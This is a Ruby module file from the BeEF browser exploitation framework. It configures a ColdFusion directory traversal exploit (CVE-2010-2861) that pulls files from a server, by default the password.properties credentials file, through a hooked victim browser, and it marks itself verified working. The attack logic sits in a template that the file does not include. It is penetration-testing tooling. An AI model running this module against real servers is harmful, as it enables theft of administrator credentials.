beef/modules/network/coldfusion_dir_traversal_exploit/module.rb

class Coldfusion_dir_traversal_exploit < BeEF::Core::Command

  #
  # Defines and set up the command module.
  #
  def initialize
    super({
      'Name' => 'ColdFusion Directory Traversal Exploit',
      'Description' => 'ColdFusion 9.0, 8.0.1, 9.0 and 9.0.1 are vulnerable to directory traversal that leads to arbitrary file retrieval from the ColdFusion server (CVE-2010-2861). </br> For SOP limitations, the victim must be hooked to BeEF through a page served by the ColdFusion server.',
      'Category' => 'Network',
      'Author' => 'antisnatchor',
      'Data' => [
         # for Same Origin Policy limitations, right now we're only handling local ColdFusion servers
         # (victim hooked on page malware.com/ciccio/pasticcio and CF server reachable at malware.com/CFIDE )
         #{'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'},
         #{'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'},
        {'name' => 'fileToRetrieve', 'ui_label' => 'Retrieve file  (in CF /lib dir)', 'value' => 'password.properties'},
        { 'name' => 'os_combobox', 'type' => 'combobox', 'ui_label' => 'CF server OS', 'store_type' => 'arraystore',
          'store_fields' => ['os'], 'store_data' => [['Windows'],['Linux/MacOSX/*BSD']],
          'valueField' => 'os', 'displayField' => 'os', 'mode' => 'local', 'autoWidth' => true
        },
        { 'name' => 'cf_version', 'type' => 'combobox', 'ui_label' => 'ColdFusion version', 'store_type' => 'arraystore',
          'store_fields' => ['cf_version'], 'store_data' => [['8'],['9']],
          'valueField' => 'cf_version', 'displayField' => 'cf_version', 'mode' => 'local', 'autoWidth' => true
        }

      ],
      'File' => __FILE__
    })

    set_target({
      'verified_status' =>  VERIFIED_WORKING,
      'browser_name' =>     ALL
    })

    use_template!
  end

  def callback
    save({'result' => @datastore['result']})
  end

end